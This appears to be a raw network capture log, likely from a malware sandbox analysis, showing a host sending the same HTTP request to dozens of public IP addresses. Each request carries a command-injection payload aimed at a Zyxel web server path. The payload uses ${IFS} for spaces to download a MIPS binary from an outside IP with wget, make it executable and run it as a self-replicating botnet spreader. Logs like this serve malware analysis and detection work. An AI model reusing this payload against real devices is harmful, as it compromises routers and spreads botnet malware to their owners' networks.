                                                Jan 12, 2024 18:24:24.568336010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1589192.168.2.1359200124.32.16.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568383932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1590192.168.2.1336342114.209.108.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568422079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1591192.168.2.135242262.213.63.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568444967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1592192.168.2.1340830133.165.229.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568480015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1593192.168.2.135255017.105.74.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568545103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1594192.168.2.1353124152.169.203.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568576097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1595192.168.2.1335160223.132.73.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568598986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1596192.168.2.1341808111.24.248.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568653107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1597192.168.2.133309045.42.108.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568681955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1598192.168.2.134761448.247.60.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568716049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1599192.168.2.1342714196.62.49.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568775892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1600192.168.2.1335776134.86.39.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568793058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1601192.168.2.134772697.239.253.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568830013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1602192.168.2.133820642.8.43.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568880081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1603192.168.2.134841220.245.194.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568902016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1604192.168.2.1342576211.204.176.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568960905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1605192.168.2.135684637.36.81.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568989992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1606192.168.2.1343248116.119.132.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569036007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1607192.168.2.135836227.172.157.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569072962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1608192.168.2.13524985.197.53.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569118977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1609192.168.2.135835645.140.182.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569147110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1610192.168.2.1334330210.199.162.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569200039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1611192.168.2.135550640.221.42.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569248915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1612192.168.2.1357164154.90.115.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569284916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1613192.168.2.1347352212.67.72.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569295883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1614192.168.2.1360168189.230.48.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569363117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1615192.168.2.1358858173.119.209.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569408894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1616192.168.2.133856693.162.231.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569442987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1617192.168.2.1358388141.68.31.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569479942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1618192.168.2.134411278.45.110.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569520950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1619192.168.2.13588624.126.114.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569574118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1620192.168.2.135710695.195.242.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569601059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1621192.168.2.1344994205.22.127.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569645882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1622192.168.2.1338298141.54.124.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569683075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1623192.168.2.1346138187.232.39.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569736958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1624192.168.2.1360962186.27.8.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569785118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1625192.168.2.133975891.146.154.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569844007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1626192.168.2.1338590212.135.221.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569874048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1627192.168.2.1346572220.58.249.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569896936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1628192.168.2.1337298207.14.178.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569950104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1629192.168.2.1350708144.255.225.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.569977045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1630192.168.2.1333036209.119.81.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570034981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1631192.168.2.1335338100.162.214.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570087910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1632192.168.2.1351546186.184.43.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570116997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1633192.168.2.135513420.170.101.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570149899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1634192.168.2.1337564221.178.20.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570192099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1635192.168.2.135792623.177.138.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570239067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1636192.168.2.136037450.9.38.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570298910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1637192.168.2.1355268108.4.230.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570348978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1638192.168.2.1338498185.177.15.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570375919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1639192.168.2.135697280.117.1.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570432901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1640192.168.2.135585888.159.27.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570492983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1641192.168.2.134183244.223.114.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570508003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1642192.168.2.135631445.200.88.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570544958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1643192.168.2.1336046143.128.194.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570585966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1644192.168.2.134458073.107.116.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570621014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1645192.168.2.135500273.233.212.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570673943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1646192.168.2.1335506223.100.52.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570713043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1647192.168.2.1345272192.183.219.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570736885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1648192.168.2.133527299.177.189.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570780993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1649192.168.2.134164427.160.98.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570832014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1650192.168.2.13354605.209.158.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570869923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1651192.168.2.1355684196.170.38.69443
                                                TimestampBytes transferredDirectionData
